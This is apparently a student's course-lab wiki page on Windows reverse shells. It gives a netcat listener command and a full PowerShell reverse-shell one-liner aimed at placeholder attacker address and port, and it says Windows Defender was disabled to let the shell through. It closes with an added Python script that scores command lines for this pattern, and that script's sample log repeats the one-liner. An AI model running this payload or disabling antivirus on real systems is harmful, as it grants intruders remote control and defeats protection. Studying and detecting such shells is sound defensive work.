Reverse Shells - Robertsegee/SEC335 GitHub Wiki

In this lab we used a reverse shell to gain access to a Windows system. The first step was to run `nc -nlv -p 4449` on our own machine, which makes it listen on TCP port 4449 and wait for the target to connect back to us. Then on the target we would run the following command (with `ATTACKERIP` and `ATTACKERPORT` replaced by the listener's address and port):
```powershell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
This would then give us a shell on the Windows machine; however, there was one other issue that came with it. Windows Defender blocked the connection because it labeled the command as malicious. To fix this I disabled Windows Defender in the settings; after that was done I was able to get into the machine successfully.
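The Defender block described above is the detection side of this lab: the one-liner combines a raw `System.Net.Sockets.TCPClient`, a loop that reads bytes from the socket, `iex` on whatever arrives, and a write of the output back to the same stream, and that combination is what makes it stand out from ordinary admin scripting. The following Python script is an added example, not part of the wiki or the course, that scores PowerShell command lines (as they would appear in process-creation or script-block logs) against those indicators and alerts only when several co-occur, so a lone `TCPClient` port check is not flagged. The log lines, the indicator names and the threshold of 3 are constructed assumptions for the example.

```python
"""Score PowerShell command lines for the reverse-shell pattern used in the lab.

Added example for illustration; the indicator names, threshold and sample log
lines below are constructed and are not from the original page.
"""
import re
from dataclasses import dataclass, field

# Each indicator alone is common in legitimate scripts (TCPClient for port
# checks, Invoke-Expression in build scripts). Interactive reverse shells are
# characterised by several of them appearing in one command line.
INDICATORS = {
    "raw_tcp_client": re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "socket_stream": re.compile(r"\.GetStream\(\)", re.I),
    "exec_from_input": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "stream_write_back": re.compile(r"\$\w+\.Write\(", re.I),
    "inline_command": re.compile(r"(?:^|\s)-(?:c|command|enc|encodedcommand)\b", re.I),
}

ALERT_THRESHOLD = 3  # assumed tuning value: number of indicators needed to alert


@dataclass
class Verdict:
    alert: bool
    score: int
    hits: list = field(default_factory=list)


def score_command_line(cmdline: str) -> Verdict:
    """Count which indicators match and decide whether the line is worth an alert."""
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(cmdline)]
    return Verdict(alert=len(hits) >= ALERT_THRESHOLD, score=len(hits), hits=hits)


def triage(log_lines):
    """Return (line_number, Verdict) for every line at or above the threshold."""
    alerts = []
    for number, line in enumerate(log_lines, start=1):
        verdict = score_command_line(line)
        if verdict.alert:
            alerts.append((number, verdict))
    return alerts


# Constructed sample of the CommandLine field from process-creation events.
# Line 3 is the lab's one-liner with its placeholders left in place.
SAMPLE_LOG = [
    r'powershell.exe -c "Get-ChildItem C:\Users | Out-String"',
    r'powershell.exe -c "$tcp = New-Object System.Net.Sockets.TCPClient(\'fileserver\', 445); $tcp.Connected; $tcp.Close()"',
    r'''powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"''',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1",
    r'powershell.exe -c "Invoke-Expression (Get-Content .\build.ps1 -Raw)"',
]

if __name__ == "__main__":
    for number, verdict in triage(SAMPLE_LOG):
        print(f"line {number}: score {verdict.score}, indicators {', '.join(verdict.hits)}")
```

Only the third sample line trips all five indicators; the port-check and build-script lines each score 2 and stay below the threshold, which is the trade-off a detection like this makes between catching the socket-plus-eval pattern and not paging on routine PowerShell use.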